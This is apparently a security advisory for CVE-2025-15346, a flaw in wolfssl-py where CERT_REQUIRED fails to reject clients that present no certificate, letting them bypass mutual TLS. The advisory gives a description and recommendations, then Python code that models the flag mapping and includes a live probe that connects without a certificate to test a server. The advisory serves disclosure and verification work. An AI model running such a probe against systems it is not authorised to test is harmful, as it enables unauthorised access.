PT-2026-1769 · Pypi · Wolfssl-Py
Matan Radomski · Published 2026-01-07 · Updated 2026-01-09
CVE-2025-15346
CVSS v4.0: 9.3 (Critical)
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
wolfssl-py versions up to and including 5.8.2
Description
A flaw exists in the handling of verify_mode = CERT_REQUIRED in the wolfSSL Python package (wolfssl-py). Because the WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT flag is not set, the library behaves as if CERT_OPTIONAL were configured: a peer certificate is verified if one is presented, but a connection from a peer that presents no certificate at all is accepted as authenticated. This is an improper-authentication issue that potentially allows an attacker to bypass mutual TLS (mTLS) client authentication simply by omitting the client certificate during the TLS handshake. The server-side verify mode alone therefore does not guarantee that a client was authenticated.
Recommendations
Versions up to and including 5.8.2 should be updated to a newer version that sets the WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT flag when verify_mode = CERT_REQUIRED is used. Deployments that cannot upgrade immediately should not rely on the verify mode alone and should confirm, after the handshake, that the peer actually presented a certificate before treating the connection as authenticated.
Fix
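As an added example (not the page's or wolfssl-py's own code), the block below does two things. First, it models the verify-mode-to-flag mapping the advisory describes, with the affected mapping beside the corrected one, and the server-side decision wolfSSL's VERIFY_PEER / VERIFY_FAIL_IF_NO_PEER_CERT semantics produce for a peer that sends no certificate. Those mapping functions are an illustrative model of the behaviour, not wolfssl-py's implementation. Second, `client_without_cert_is_accepted` is a live probe a practitioner can run against a deployed wolfssl-py server with any TLS client: it connects without a client certificate using only Python's standard `ssl` module and reports whether application data flowed. The host, port and HTTP probe payload are assumptions; adapt the payload to whatever request the service answers.

```python
"""Model and live probe for the CERT_REQUIRED / missing
WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT behaviour (CVE-2025-15346).
Added example; not wolfssl-py code."""
import socket
import ssl
from typing import Optional

# Verify modes, same names and values as Python's ssl module (wolfssl-py mirrors them).
CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED = ssl.CERT_NONE, ssl.CERT_OPTIONAL, ssl.CERT_REQUIRED

# wolfSSL verify-mode bit flags (values as defined in wolfSSL's ssl.h).
WOLFSSL_VERIFY_NONE = 0
WOLFSSL_VERIFY_PEER = 1
WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT = 2


def verify_flags_vulnerable(mode: ssl.VerifyMode) -> int:
    """Illustrative model (assumption) of the affected behaviour: CERT_REQUIRED
    is turned into the same wolfSSL flags as CERT_OPTIONAL, i.e. VERIFY_PEER only."""
    if mode == CERT_NONE:
        return WOLFSSL_VERIFY_NONE
    return WOLFSSL_VERIFY_PEER  # CERT_OPTIONAL and CERT_REQUIRED collapse here


def verify_flags_fixed(mode: ssl.VerifyMode) -> int:
    """Mapping that matches the advisory's recommendation: CERT_REQUIRED also sets
    WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT so that a missing peer cert fails the handshake."""
    if mode == CERT_NONE:
        return WOLFSSL_VERIFY_NONE
    if mode == CERT_OPTIONAL:
        return WOLFSSL_VERIFY_PEER
    return WOLFSSL_VERIFY_PEER | WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT


def handshake_outcome(flags: int, cert_presented: bool, cert_valid: bool = True) -> str:
    """Server-side decision given its verify flags and what the peer sent.
    VERIFY_PEER checks a certificate if one is presented; FAIL_IF_NO_PEER_CERT
    additionally rejects a handshake in which no certificate was sent at all."""
    if not flags & WOLFSSL_VERIFY_PEER:
        return "accepted"                      # no client authentication requested
    if cert_presented:
        return "accepted" if cert_valid else "rejected"
    if flags & WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT:
        return "rejected"
    return "accepted"                          # the mTLS bypass: no cert, no failure


def client_without_cert_is_accepted(host: str, port: int, cafile: Optional[str] = None,
                                    probe: bytes = b"GET / HTTP/1.0\r\n\r\n",
                                    timeout: float = 5.0) -> bool:
    """Live check against a deployed server. Connect with a TLS client that holds
    NO certificate, then try to exchange application data. True means an
    unauthenticated client got through (the CERT_REQUIRED bypass); False means
    the handshake or the first read was refused, the expected mTLS behaviour.
    A socket timeout propagates: the server neither answered nor refused."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=cafile)
    if cafile is None:
        # We are testing the server's client authentication, not its own chain,
        # so accept an untrusted server certificate when no CA bundle was given.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    # Deliberately no load_cert_chain(): the client has nothing to present.
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                tls.sendall(probe)
                # Under TLS 1.3 a server may only reject the missing certificate after
                # the client's Finished, so the refusal can surface as an alert or EOF
                # on this read rather than as a handshake failure above.
                return len(tls.recv(4096)) > 0
    except (ssl.SSLError, ConnectionError):
        return False


if __name__ == "__main__":
    for name, mapping in (("affected", verify_flags_vulnerable), ("fixed", verify_flags_fixed)):
        print(f"{name}: CERT_REQUIRED, no client cert ->",
              handshake_outcome(mapping(CERT_REQUIRED), cert_presented=False))
    # Example usage against a real endpoint (host/port are assumptions):
    # print(client_without_cert_is_accepted("mtls.example.internal", 8443, cafile="ca.pem"))
```

A True result from the probe against a server configured with CERT_REQUIRED is the condition the advisory describes; after upgrading, the same probe should return False. Run it from a host that is allowed to reach the service, and expect a timeout rather than a verdict if the service needs a different first message than the default HTTP request.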
Missing Authentication
Improper Authentication
Related identifiers
Affected products
Wolfssl-Py